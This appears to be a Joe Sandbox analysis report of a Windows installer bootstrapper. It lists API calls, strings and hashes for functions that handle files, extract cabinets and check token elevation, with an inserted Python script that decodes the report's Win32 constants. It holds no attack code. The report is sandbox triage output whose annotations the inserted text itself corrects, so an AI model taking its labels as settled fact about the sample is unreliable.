                                                            • Opcode ID: 7111127c93fc96d3851c09acb9c8e70b2a4decbce4e15da5f837c3869198bb5e
                                                            • Instruction ID: 194fb7f9f51c4a0d2232ce3cb619004f77fb96ffde5ab93d66769bd7b2a771de
                                                            • Opcode Fuzzy Hash: 7111127c93fc96d3851c09acb9c8e70b2a4decbce4e15da5f837c3869198bb5e
                                                            • Instruction Fuzzy Hash: 6951A471A40215BEC724DB68CC86F9A7B6CFF04760F104125FA18E7390D7B4E950DBA5

                                                            Control-flow Graph: function blocks 87c28f-87c404 (calls CreateFileW, GetCurrentProcess, DuplicateHandle, SetFilePointerEx); interactive graph and executed/not-executed legend not rendered
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0087C47F,00875405,?,?,00875445), ref: 0087C2D6
                                                            • GetLastError.KERNEL32(?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C2E7
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?), ref: 0087C336
                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C33C
                                                            • DuplicateHandle.KERNELBASE(00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C33F
                                                            • GetLastError.KERNEL32(?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C349
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C39B
                                                            • GetLastError.KERNEL32(?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 0087C3A5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                            • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                            • API String ID: 2619879409-373955632
                                                            • Opcode ID: 8aa905eb7a00f2eddf3ce133af66945f7811d2e2398a9ccf71bf754c9babfff4
                                                            • Instruction ID: 1ff18396e4f3afcebae6442184fa982cb141c6d27e9dff0d009e5acaf9941da6
                                                            • Opcode Fuzzy Hash: 8aa905eb7a00f2eddf3ce133af66945f7811d2e2398a9ccf71bf754c9babfff4
                                                            • Instruction Fuzzy Hash: 2A41E836540201ABDB219F598C49E5B7BA5FBC4720F21C12DFE28EB386DB71C801DB61

                                                            Control-flow Graph: function blocks 8b2af7-8b2c35 (seven consecutive GetProcAddress calls); interactive graph and executed/not-executed legend not rendered
                                                            APIs
                                                              • Part of subcall function 00873838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00873877
                                                              • Part of subcall function 00873838: GetLastError.KERNEL32 ref: 00873881
                                                              • Part of subcall function 008B4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008B4A9D
                                                            • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 008B2B41
                                                            • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 008B2B61
                                                            • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 008B2B81
                                                            • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 008B2BA1
                                                            • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 008B2BC1
                                                            • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 008B2BE1
                                                            • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 008B2C01
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLast$DirectorySystem
                                                            • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                            • API String ID: 2510051996-1735120554
                                                            • Opcode ID: 8d9168c8772bb98897a364cc22d2e6ec91fa3a741ec5599c321773ad54cf48fe
                                                            • Instruction ID: 8f4b62a91d8ffad28b14c1097f08c90278fce8c0ff1ddfbbf86143094a865c5a
                                                            • Opcode Fuzzy Hash: 8d9168c8772bb98897a364cc22d2e6ec91fa3a741ec5599c321773ad54cf48fe
                                                            • Instruction Fuzzy Hash: 3D31C4B0942208EBDB119F21FD06B6A7BA0FB34755F02032BE414967B0EBB5C855DF54
                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0087C3EB,?,00000000,?,0087C47F), ref: 00891778
                                                            • GetLastError.KERNEL32(?,0087C3EB,?,00000000,?,0087C47F,00875405,?,?,00875445,00875445,00000000,?,00000000), ref: 00891781
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorEventLast
                                                            • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                            • API String ID: 545576003-938279966
                                                            • Opcode ID: 34e77328cd85ee0c95f2fde799769ad59b38dd4388b5416f12e69a70ea77285a
                                                            • Instruction ID: f8583f84c603eba9c1d5a8faaddc93e7d7265914d35e036d3c6b255b5bfcaa10
                                                            • Opcode Fuzzy Hash: 34e77328cd85ee0c95f2fde799769ad59b38dd4388b5416f12e69a70ea77285a
                                                            • Instruction Fuzzy Hash: ED210A77D8463B76DF2136994C4AF2B6A5CFB007A4B064635BD20FB280E774DC0085E2
                                                            APIs
                                                            • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 008AFCD6
                                                            • GetProcAddress.KERNEL32(SystemFunction041), ref: 008AFCE8
                                                            • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 008AFD2B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 008AFD3F
                                                            • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 008AFD77
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 008AFD8B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$ErrorLast
                                                            • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                            • API String ID: 4214558900-3191127217
                                                            • Opcode ID: 3151123cc810e52da472a0fbaa85eda064ae8367b7edbe1f17d983ad54cf1b2f
                                                            • Instruction ID: 78aed266766afa2990abc67caf80acde2c6b560db7e942819669670b26a8756c
                                                            • Opcode Fuzzy Hash: 3151123cc810e52da472a0fbaa85eda064ae8367b7edbe1f17d983ad54cf1b2f
                                                            • Instruction Fuzzy Hash: 15215332942236DBE7226B96BD067567BA0FB01B55F170337EE10E6762FB748C00DA91
                                                            APIs
                                                            • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 008908F2
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0089090A
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0089090F
                                                            • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 00890912
                                                            • GetLastError.KERNEL32(?,?), ref: 0089091C
                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0089098B
                                                            • GetLastError.KERNEL32(?,?), ref: 00890998
                                                            Strings
                                                            • Failed to duplicate handle to cab container., xrefs: 0089094A
                                                            • Failed to add virtual file pointer for cab container., xrefs: 00890971
                                                            • <the>.cab, xrefs: 008908EB
                                                            • cabextract.cpp, xrefs: 00890940, 008909BC
                                                            • Failed to open cabinet file: %hs, xrefs: 008909C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                            • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
                                                            • API String ID: 3030546534-3446344238
                                                            • Opcode ID: ad43a9fe470ff5bafd40fe2a1660231a110d304b012b14e4acef9488bf88dcf1
                                                            • Instruction ID: e5ceb03473a23ffeb39607272cde9afcd7fdb02f35b991c71262de9faf711f71
                                                            • Opcode Fuzzy Hash: ad43a9fe470ff5bafd40fe2a1660231a110d304b012b14e4acef9488bf88dcf1
                                                            • Instruction Fuzzy Hash: 2131CF3294163ABFEB216A998C49F9ABF68FF04760F154225FE18F7251D7709D008AE1
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,00874E11,?,?), ref: 00886A77
                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,00874E11,?,?), ref: 00886A7D
                                                            • DuplicateHandle.KERNELBASE(00000000,?,?,00874E11,?,?), ref: 00886A80
                                                            • GetLastError.KERNEL32(?,?,00874E11,?,?), ref: 00886A8A
                                                            • CloseHandle.KERNEL32(000000FF,?,00874E11,?,?), ref: 00886B03
                                                            Strings
                                                            • %ls -%ls=%u, xrefs: 00886AD7
                                                            • burn.filehandle.attached, xrefs: 00886AD0
                                                            • core.cpp, xrefs: 00886AAE
                                                            • Failed to duplicate file handle for attached container., xrefs: 00886AB8
                                                            • Failed to append the file handle to the command line., xrefs: 00886AEB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                            • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
                                                            • API String ID: 4224961946-4196573879
                                                            • Opcode ID: 1d06a798512a2433d3f48d58813093f6ae5d2466d360c1f1402d0c96b7c13648
                                                            • Instruction ID: d0674f038ec124b789fceaa8806a160aae6a6e9027c95c0624d406a03d14c5c3
                                                            • Opcode Fuzzy Hash: 1d06a798512a2433d3f48d58813093f6ae5d2466d360c1f1402d0c96b7c13648
                                                            • Instruction Fuzzy Hash: EF117232940625BBCB14AAA89D05E9E7B68FF05770F108355F924F72D0E7B49D109791
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 008B3309
                                                            • SysAllocString.OLEAUT32(?), ref: 008B3325
                                                            • VariantClear.OLEAUT32(?), ref: 008B33AC
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B33B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: `<u$xmlutil.cpp
                                                            • API String ID: 760788290-3482516102
                                                            • Opcode ID: b4185fb8012f92a9f4aed368cbc66ef1c45f509e32d5fe9be858fc1085db37bd
                                                            • Instruction ID: 2509cd9bebc469e129c6123ec5abecf0300106fae0e4b8d3c75fa920c0d47c3a
                                                            • Opcode Fuzzy Hash: b4185fb8012f92a9f4aed368cbc66ef1c45f509e32d5fe9be858fc1085db37bd
                                                            • Instruction Fuzzy Hash: 5D215E31901219AFCB119B98D848EEFBBF9FF48715F154258F905EB310DB719E008B91
                                                            APIs
                                                            • OpenProcessToken.ADVAPI32(?,00000008,?,008753BD,00000000,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B0897
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08A1
• GetTokenInformation.KERNELBASE(?,00000014(TokenElevation),?,00000004,?,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08D3
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08EC
                                                            • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B092B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                            • String ID: procutil.cpp
                                                            • API String ID: 4040495316-1178289305
                                                            • Opcode ID: 8aa9327ec2f92ca947414f023d6b23c265d1f5e1270dbe573504448e24fd1b62
                                                            • Instruction ID: 17fa9d8652914305fa756c21b6e5d27109620e9bf39a5b6dd90c2e9c47d6a7a3
                                                            • Opcode Fuzzy Hash: 8aa9327ec2f92ca947414f023d6b23c265d1f5e1270dbe573504448e24fd1b62
                                                            • Instruction Fuzzy Hash: C1219232D40629ABD721AB959C05AEFFFA8FF10711F114166AD54EB360D3708E009ED1
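The parenthesised names that Joe Sandbox attaches to raw arguments (the `(TokenIntegrityLevel)` it originally placed next to `00000014` in the GetTokenInformation call above) are tool annotations, not recovered symbols, and are worth checking against the SDK headers before they go into a write-up: in TOKEN_INFORMATION_CLASS the value 20 (0x14) is TokenElevation, TokenIntegrityLevel is 25, and the 4-byte output buffer in the same call fits a TOKEN_ELEVATION DWORD, so this function asks whether the token is elevated rather than reading its integrity label. The following Python is an added example, not part of the report or of the analysed sample: it parses lines in the report's own `Api.MODULE(args), ref: addr` format, decodes the constants it recognises (token access rights, TOKEN_INFORMATION_CLASS, CreateFile access/share/disposition/flags) and flags report annotations that disagree with the header values. The three input lines are copied from the listing on this page (the GetTokenInformation line as the tool originally annotated it); the constant tables come from winnt.h and fileapi.h and are the only assumptions made.

```python
"""Parse Joe Sandbox 'APIs' lines and decode the raw Win32 constants in them."""
import re
from dataclasses import dataclass

# Constructed input: three API lines copied from the report listing above.
SAMPLE_LINES = [
    "• OpenProcessToken.ADVAPI32(?,00000008,?,008753BD,00000000,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B0897",
    "• GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,0088769D,00000000), ref: 008B08D3",
    "• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0089098B",
]

LINE_RE = re.compile(r"^\W*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
ARG_RE = re.compile(r"^(?P<hex>[0-9A-Fa-f]{8})(?:\((?P<note>[^)]*)\))?$")

# TOKEN_INFORMATION_CLASS from winnt.h: TokenUser == 1, the rest are consecutive.
TOKEN_INFORMATION_CLASS = {i + 1: name for i, name in enumerate([
    "TokenUser", "TokenGroups", "TokenPrivileges", "TokenOwner", "TokenPrimaryGroup",
    "TokenDefaultDacl", "TokenSource", "TokenType", "TokenImpersonationLevel",
    "TokenStatistics", "TokenRestrictedSids", "TokenSessionId", "TokenGroupsAndPrivileges",
    "TokenSessionReference", "TokenSandBoxInert", "TokenAuditPolicy", "TokenOrigin",
    "TokenElevationType", "TokenLinkedToken", "TokenElevation", "TokenHasRestrictions",
    "TokenAccessInformation", "TokenVirtualizationAllowed", "TokenVirtualizationEnabled",
    "TokenIntegrityLevel"])}
TOKEN_ACCESS = [(0x0001, "TOKEN_ASSIGN_PRIMARY"), (0x0002, "TOKEN_DUPLICATE"), (0x0004, "TOKEN_IMPERSONATE"),
                (0x0008, "TOKEN_QUERY"), (0x0010, "TOKEN_QUERY_SOURCE"), (0x0020, "TOKEN_ADJUST_PRIVILEGES"),
                (0x0040, "TOKEN_ADJUST_GROUPS"), (0x0080, "TOKEN_ADJUST_DEFAULT"), (0x0100, "TOKEN_ADJUST_SESSIONID")]
GENERIC_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                  (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE_MODE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = [(0x00000080, "FILE_ATTRIBUTE_NORMAL"), (0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"),
              (0x08000000, "FILE_FLAG_SEQUENTIAL_SCAN"), (0x40000000, "FILE_FLAG_OVERLAPPED"),
              (0x80000000, "FILE_FLAG_WRITE_THROUGH")]


@dataclass
class ApiCall:
    api: str
    module: str
    args: list      # None for '?', int for an 8-digit hex literal, str for anything else
    notes: dict     # argument index -> name the report attached in parentheses
    ref: int        # call-site address


def parse_api_line(line: str) -> ApiCall:
    """Split one report line into API name, module, argument list and call site."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    call = ApiCall(m["api"], m["module"], [], {}, int(m["ref"], 16))
    for i, raw in enumerate(m["args"].split(",")):
        raw = raw.strip()
        am = ARG_RE.match(raw)
        if raw == "?":
            call.args.append(None)          # value the sandbox could not recover
        elif am:
            call.args.append(int(am["hex"], 16))
            if am["note"]:
                call.notes[i] = am["note"]  # the tool's own annotation, kept for checking
        else:
            call.args.append(raw)           # string literal seen on the stack
    return call


def bitnames(value: int, table) -> str:
    """Decompose a bitmask into the named flags from table; leftover bits stay as hex."""
    names = [name for bit, name in table if value & bit]
    rest = value & ~sum(bit for bit, _ in table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) if names else "0"


def decode(call: ApiCall) -> dict:
    """Annotate the arguments we know how to read; keys are argument indices."""
    a, out = call.args, {}
    if call.api == "OpenProcessToken" and isinstance(a[1], int):
        out[1] = bitnames(a[1], TOKEN_ACCESS)
    elif call.api == "GetTokenInformation" and isinstance(a[1], int):
        out[1] = TOKEN_INFORMATION_CLASS.get(a[1], f"unknown({a[1]})")
        if isinstance(a[3], int):
            out[3] = f"buffer={a[3]} bytes"
    elif call.api in ("CreateFileA", "CreateFileW"):
        if isinstance(a[1], int): out[1] = bitnames(a[1], GENERIC_ACCESS)
        if isinstance(a[2], int): out[2] = bitnames(a[2], SHARE_MODE)
        if isinstance(a[4], int): out[4] = CREATION.get(a[4], f"unknown({a[4]})")
        if isinstance(a[5], int): out[5] = bitnames(a[5], FILE_FLAGS)
    return out


def check_tool_notes(call: ApiCall) -> dict:
    """Report annotations that disagree with the header tables: index -> (tool's name, ours)."""
    ours = decode(call)
    return {i: (n, ours[i]) for i, n in call.notes.items() if i in ours and ours[i] != n}


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        c = parse_api_line(line)
        print(f"{c.api} @ {c.ref:08X}: {decode(c)}  mismatches={check_tool_notes(c)}")
```

Run on the three lines, the script reports `TOKEN_QUERY` for the OpenProcessToken access mask, `TokenElevation` with a 4-byte buffer for GetTokenInformation (flagging the tool's `TokenIntegrityLevel` label as a mismatch), and `GENERIC_READ`, `FILE_SHARE_READ`, `OPEN_EXISTING`, `FILE_ATTRIBUTE_NORMAL|FILE_FLAG_SEQUENTIAL_SCAN` for the CreateFileA call from the cabextract.cpp function. Extending the tables to the other APIs in this report (DuplicateHandle options, CreateDirectory, GlobalAlloc flags) is a matter of adding entries.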
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 00886B49
                                                            • CloseHandle.KERNEL32(00000000), ref: 00886BB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle
                                                            • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                            • API String ID: 3498533004-3263533295
                                                            • Opcode ID: de69b3ba5bb9c0d2f6f20c4648a135ec7589d8980290b316f1e812b63dc0bd9a
                                                            • Instruction ID: 7a9fa973cf66e4dc2bbd1006776e83d073a49ae156267bb99340060f5818b70d
                                                            • Opcode Fuzzy Hash: de69b3ba5bb9c0d2f6f20c4648a135ec7589d8980290b316f1e812b63dc0bd9a
                                                            • Instruction Fuzzy Hash: 0E11D631A40614BBCB206A68DC05F9B7BA8FB45734F054354FD38EB3D1E7B494214791
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 008B3574
                                                            • InterlockedIncrement.KERNEL32(008DB6C8), ref: 008B3591
                                                            • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,008DB6B8,?,?,?,?,?,?), ref: 008B35AC
                                                            • CLSIDFromProgID.OLE32(MSXML.DOMDocument,008DB6B8,?,?,?,?,?,?), ref: 008B35B8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FromProg$IncrementInitializeInterlocked
                                                            • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                            • API String ID: 2109125048-2356320334
                                                            • Opcode ID: c5e569e8281a8c9f15c2ecb27c2eb40c2d797bde2e2e895d2766c62e3a85d96b
                                                            • Instruction ID: 2a3a1ebbd29947df1e36d93bb4d561768c8affa4a54a7ccb8420a3dfba0a231d
                                                            • Opcode Fuzzy Hash: c5e569e8281a8c9f15c2ecb27c2eb40c2d797bde2e2e895d2766c62e3a85d96b
                                                            • Instruction Fuzzy Hash: 9DF0E53074122AA7C3301FA27D08B872FA5FB90B64F01072AE950C2350E7A0C94586B0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008B4A9D
                                                            • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 008B4ACA
                                                            • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 008B4AF6
                                                            • GetLastError.KERNEL32(00000000,008BB7A0,?,00000000,?,00000000,?,00000000), ref: 008B4B34
                                                            • GlobalFree.KERNEL32(00000000), ref: 008B4B65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Global$AllocFree
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 1145190524-2967768451
                                                            • Opcode ID: 7bb3efb783a3ebc72f54acd9f9311ee288ff74ee06844c68a3544cdb374fc73e
                                                            • Instruction ID: 16df7e0c4bdac14503048b9a0bf66f53e8d551bfc91de03bf509bd367205e789
                                                            • Opcode Fuzzy Hash: 7bb3efb783a3ebc72f54acd9f9311ee288ff74ee06844c68a3544cdb374fc73e
                                                            • Instruction Fuzzy Hash: 8B31AF36A40239ABC7219AD98C42FEFBBA8FF44760F114265EE54E7342E730DC0096E5
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00890B27
                                                            • GetLastError.KERNEL32(?,?,?), ref: 00890B31
                                                            Strings
                                                            • Invalid seek type., xrefs: 00890ABD
                                                            • cabextract.cpp, xrefs: 00890B55
                                                            • Failed to move file pointer 0x%x bytes., xrefs: 00890B62
                                                            Memory Dump Source
